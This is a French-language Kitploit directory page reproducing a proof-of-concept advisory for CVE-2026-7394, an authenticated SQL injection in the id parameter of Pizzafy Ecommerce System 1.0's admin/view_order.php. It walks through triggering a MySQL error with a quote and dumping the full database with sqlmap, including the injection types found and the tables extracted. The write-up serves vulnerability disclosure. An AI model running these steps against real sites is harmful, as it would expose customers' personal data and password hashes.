Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-7394-SQLI — Exploit de preuve de concept pour CVE-2026-7394, une vulnérabilité d'injection SQL dans SourceCodester Pizzafy Ecommerce System 1.0. Démontre une injection SQL authentifiée d'administrateur via le paramètre `id` dans `admin/view_order.php`, permettant un dump complet de la base de données incluant les identifiants utilisateur et les informations personnelles identifiables (PII). | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-7394-sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 3 moisPas encore vérifié

À propos

Exploit de preuve de concept pour CVE-2026-7394, une vulnérabilité d'injection SQL dans SourceCodester Pizzafy Ecommerce System 1.0. Démontre une injection SQL authentifiée d'administrateur via le paramètre `id` dans `admin/view_order.php`, permettant un dump complet de la base de données incluant les identifiants utilisateur et les informations personnelles identifiables (PII).

Partager

Injection SQL dans le système e-commerce Pizzafy — admin/view_order.php

Détails

ChampValeur
VendeurSourceCodester
ProduitSystème e-commerce Pizzafy utilisant PHP et MySQL
Version1.0
VulnérabilitéInjection SQL
CWECWE-89
Score CVSSv37.2 (Élevé)
Vecteur d'attaqueRéseau
Authentification requiseOui (Administrateur)
ChercheurXmyronn
Date2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


Composant affecté

Fichier : Pizzafy/admin/view_order.php
Paramètre : id (GET)


Description

Le point d'accès admin/view_order.php dans le système e-commerce Pizzafy 1.0 ne parvient pas à nettoyer correctement le paramètre GET id avant de le transmettre à une requête MySQL. Un administrateur authentifié peut manipuler ce paramètre pour injecter du SQL arbitraire, entraînant une compromission complète de la base de données.


Preuve de concept

Étape 1 — Connexion en tant qu'administrateur

Naviguer vers :

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

Se connecter avec les identifiants administrateur.

Étape 2 — Naviguer vers les commandes

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

Cliquer sur Voir la commande sur n'importe quelle entrée de commande. Screenshot 2026-04-11 212116

Étape 3 — Intercepter la requête dans Burp Suite

La requête GET interceptée ressemble à : Screenshot 2026-04-11 212135

Étape 4 — Déclencher une erreur SQL

Modifier id=1 en id=' : Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

Réponse — Erreur MySQL exposée :

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

Étape 5 — Exploitation avec sqlmap

Enregistrer la requête dans view_order.txt et exécuter :

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap a confirmé les types d'injection :

TypeTitre
Aveugle basé sur booléenAND boolean-based blind — clause WHERE
Basé sur erreurMySQL >= 5.0 FLOOR error-based
Aveugle basé sur le tempsMySQL >= 5.0.12 SLEEP
Requête UNIONGeneric UNION query — 11 colonnes

Base de données entièrement extraite :

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

Les données sensibles exposées incluent les hachages de mots de passe bcrypt, les emails des clients, les détails des commandes et la configuration du système.


Impact

Un administrateur authentifié malveillant (ou un attaquant ayant obtenu des identifiants admin) peut :

  • Extraire l'intégralité de la base de données, y compris les hachages de mots de passe
  • Lire les PII sensibles des clients (noms, emails, adresses, numéros de téléphone)
  • Potentiellement écrire dans la base de données

Références

  • SourceCodester — Système e-commerce Pizzafy
  • CWE-89 : Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL.
Télécharger l’outil